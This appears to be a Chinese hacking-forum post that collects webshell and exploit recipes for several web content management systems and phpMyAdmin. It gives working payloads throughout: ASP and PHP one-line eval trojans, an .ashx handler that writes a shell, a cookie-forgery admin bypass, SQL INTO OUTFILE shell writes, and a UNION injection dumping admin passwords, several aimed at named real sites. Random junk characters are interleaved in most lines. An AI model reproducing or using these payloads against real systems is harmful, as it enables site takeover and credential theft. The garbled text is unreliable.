<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
$ a. {" V7 W8 H4 ~) O1 b& ~4 F4 A1 B0 jUpload a new file:<br>& N0 }: j, y1 q6 ^/ j
<input type="file" name="NewFile" size="50"><br>
8 _4 { o D; c2 e- V2 B<input id="btnUpload" type="submit" value="Upload">. s6 d4 Z F2 s6 j1 v4 V$ U$ L8 b
</form>
7 q! C. K8 Q* O: }-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 k( F4 q. i+ {% a5 f$ |7 n" s' w
. t H$ e B" F9 i: c3 y
SDcms 后台拿webshell# X% n3 P; B* t" Y! G4 `! t
+ \8 ?: `/ s3 D- Y+ Y( {+ i
第一种方法:2 F# X: w4 q7 m- N% ]* C. R' Z9 a
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
8 q) |( V+ s4 A, q把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx' [9 `% g2 C) d, R/ E! ?
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。/ Y' q/ y' w6 A
第二种方法:! V! K4 F; |7 \
进入后台-->系统管理-->系统设置-->系统设置->上传设置;- [, {7 [- P. \, k `$ ~3 W
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
% z! s6 R, v5 N第三种方法:
( k; H* _" H; ~/ |; Z" Y, O进入后台-->界面管理-->模板文件管理-->创建文件- H& g7 P4 K' J3 p, B
文件名写入getshell.ashx
2 k, a9 O/ T7 v# h& W内容写入下面内容:
& }6 {1 I/ u5 J1 a/====================复制下面的=========================/4 w' M2 s0 Y2 N7 L/ N
<%@ WebHandler Language="C#" Class="Handler" %>2 ?4 u" L8 a5 D& v8 e
using System;! G4 v% P+ `) K I3 B2 l6 a
using System.Web;
( ~' d: s7 }# x3 Gusing System.IO;
. |0 d7 S, _4 Epublic class Handler : IHttpHandler {, G" |! h9 H4 g2 f7 ^9 M8 B- m
public void ProcessRequest (HttpContext context) {
7 L. a# z2 I. T& k. |# v+ Hcontext.Response.ContentType = "text/plain";
' ?- D6 H( X: J1 R; ? D( i* ZStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* t2 l9 I. B, z. o( E9 s' M
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
) S9 u" E; z+ S/ } ?file1.Flush();
+ O3 k( O0 H1 t; c' Hfile1.Close();3 G0 u3 d5 P' P y
}' V% B* x3 O+ G! w. o
public bool IsReusable {6 E" ^+ O8 p" P( L
get {
/ W5 _" d Z$ Jreturn false;
( b& C5 A6 s9 r% M}
' ?& z+ _, z4 B% k: M5 s5 k}
* h$ n9 z' |, C& f" H! _/ W}
0 m1 z, i6 {+ u' n/=============================================/
& j( L* k8 n& Z' }访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx+ c' w/ M! `4 F: N5 C
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
8 p4 a. a1 d8 Z9 i9 c9 q; b9 \+ W-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------! E; h9 z {7 l' ?: [: l6 Y
6 c0 g+ F7 {: \) Q, c9 J; h7 G0 AESCMS网站管理系统0day( |& I$ c W L8 u2 z
! H9 c+ ]! i# E* \; L
后台登陆验证是通过admin/check.asp实现的
6 K( A: x# f3 v% p2 S( I! `( z
5 U. f( [1 y- i& M |首先我们打开http://target.com/admin/es_index.html
! t* m0 W0 s. C/ S7 I然后在COOKIE结尾加上/ O; Q" N1 T4 y/ L
; ESCMS$_SP2=ES_admin=st0p;
+ h8 u. z$ v) g( l: q4 x修改,然后刷新9 I0 e1 H( X# S8 O, y3 p6 b
进后台了嘎..& b* C. i! s0 K8 y
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
+ Q( A5 p% q) L6 }1 f4 U/ m$ r) U% I8 _& c% a
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
0 ` S9 o9 f1 J1 H/ Y, m嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
4 u- h5 N0 [- `存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
6 H+ Z9 S' h. c+ X在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了3 n7 `! O1 ~4 C `4 L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------; j& [& W3 I6 t# L; D) n; F
# c0 z) \9 K: R- l宁志网站管理系统后台无验证漏洞及修复0 _# l# P6 U/ \. e$ _
. Q* W7 E4 ?4 u网上搜了一下,好像没有发布.如有雷同纯粹巧合!, R4 l3 t0 T/ b' R$ {9 c5 s
官方网站:www.ningzhi.net
8 x$ s- T' x4 q. H/ @9 D. p+ S: w学校网站管理系统 V.2011版本
% b$ k( C4 A$ o, Ohttp://down.chinaz.com/soft/29943.htm : l* e/ _6 q% z7 |
其它版本(如:政府版等),自行下载.- J/ K! B# r1 {. v; Z- _
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~, c S9 c. `' x5 P3 Q2 u9 m
login.asp代码如下:
) g2 x: c. Y. _9 u, X7 C# P1 W @<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
6 |2 E: q* k' L2 G$ _" [ b0 Gmanage.asp代码我就不帖出来了.反正也没验证.
( u9 v8 q0 M$ b5 `) s* F只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!; T7 h! \- E6 c; D! j5 n! w1 Y0 B( `
漏洞利用:
( H# _8 c: x1 {( i7 O直接访问http://www.0855.tv/admin/manage.asp v8 c6 i( H4 \/ W, h
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5/ T8 ~( l' l( u! L& k$ b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) @- g6 B; E6 m3 ]2 K. a! p/ b- j0 T$ a' I0 V0 Y) d k
phpmyadmin拿shell的四种方法总结及修复& ^2 h2 Y/ V7 ~ C* N& }
# s( T- t$ T8 r方法一:; Y' e5 o: @* J; i1 e' v1 [2 Y4 e
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );# L# [/ m" i* a+ {; E1 p- d& M
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');( x6 d8 }% p \, z7 H
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';/ |' u# a" {3 D1 }
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
7 j/ i1 x' F* m: Y. l7 ?3 | 一句话连接密码:7on: g+ D K H& u/ e; e D
方法二:
! Z# F! l9 i" r& I& L1 [读取文件内容: select load_file('E:/xamp/www/s.php');
: z& j* F& ?1 ]2 Q& q9 O6 ~- k& ? ~写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'$ q: U+ z+ B% \* o& M
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 q3 Z! |, {. f$ Q" T: J. q方法三:4 _7 u' b# F; e9 {3 Q
JhackJ版本 PHPmyadmin拿shell& d) F! J( k1 N6 j3 w+ g8 p
Create TABLE study (cmd text NOT NULL);1 L! t+ R+ N( T; U7 {
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');! Q7 J( w; N& O) x: u
select cmd from study into outfile 'E:/wamp/www/7.php';
1 f. d, ~6 u( H6 P. _( n: \. ~, B! a/ ~Drop TABLE IF EXISTS study;' Y: [' i& P( L2 a7 o, _$ k+ {
<?php eval($_POST[cmd])?>, y; ]$ v+ M( i7 S% M+ Q' \) h
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。8 E1 c& ^9 a$ p! a
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
+ H3 G9 b, [; G. m7 B- XSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 11 W+ O) n H0 G
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
' b0 F; w) l0 v' q y# \方法四:$ O7 w! I$ y5 \; Q" M6 [6 P) ?* f
select load_file('E:/xamp/www/study.php');
7 H3 |: L9 C, n; {0 Q1 {5 Pselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
/ h, }8 u- j+ _4 x- V% q4 j2 C1 c然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
2 Y' t3 m4 U+ E. u! T-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 T1 F3 L5 c2 ?2 p& O$ G. P- G# {( T; v7 B( ~6 n
NO.001中学网站管理系统 Build 110628 注入漏洞' R2 i4 ^- R; W! X$ T5 X
% e0 z+ E0 t f) |) ^6 t" cNO.001中学网站管理系统功能模块:
/ J r0 c: B0 i5 O) Q: X( i1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
1 y6 \7 I& ?) j2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息. t5 J% {1 y& r7 L
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息- ]7 U! z. J1 c0 s* B0 P, b
4.视频图片管理:一级分类,动态添加视频或者图片等信息) [* \9 Q7 ^0 V; Z) n- z2 f
5.留言管理:对留言,修改,删除、回复等管理! g/ c. J* T6 \& p3 @! J
6.校友频道:包括校友资料excel导出、管理等功能
5 t+ f, |0 C( ?, j/ {) o$ z7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页% }/ x* s- I' F2 U8 L
默认后台:admin/login.asp9 ^- i9 R1 l* D5 [, r% d& n
官方演示:http://demo.001cms.net- ^0 }2 c h$ F
源码下载地址:http://down.chinaz.com/soft/30187.htm% \* `0 Q2 Q) n& a
EXP:
# j! `( o- m8 h2 Z0 C# Nunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 q, U* ~% X, d1 s* h( {测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
: j8 \, {" X( h7 G* d. c2 {getshell:后台有备份,你懂的
9 \3 q. A4 W+ j+ I' [另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。) N5 F9 r( H9 B1 I" P
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对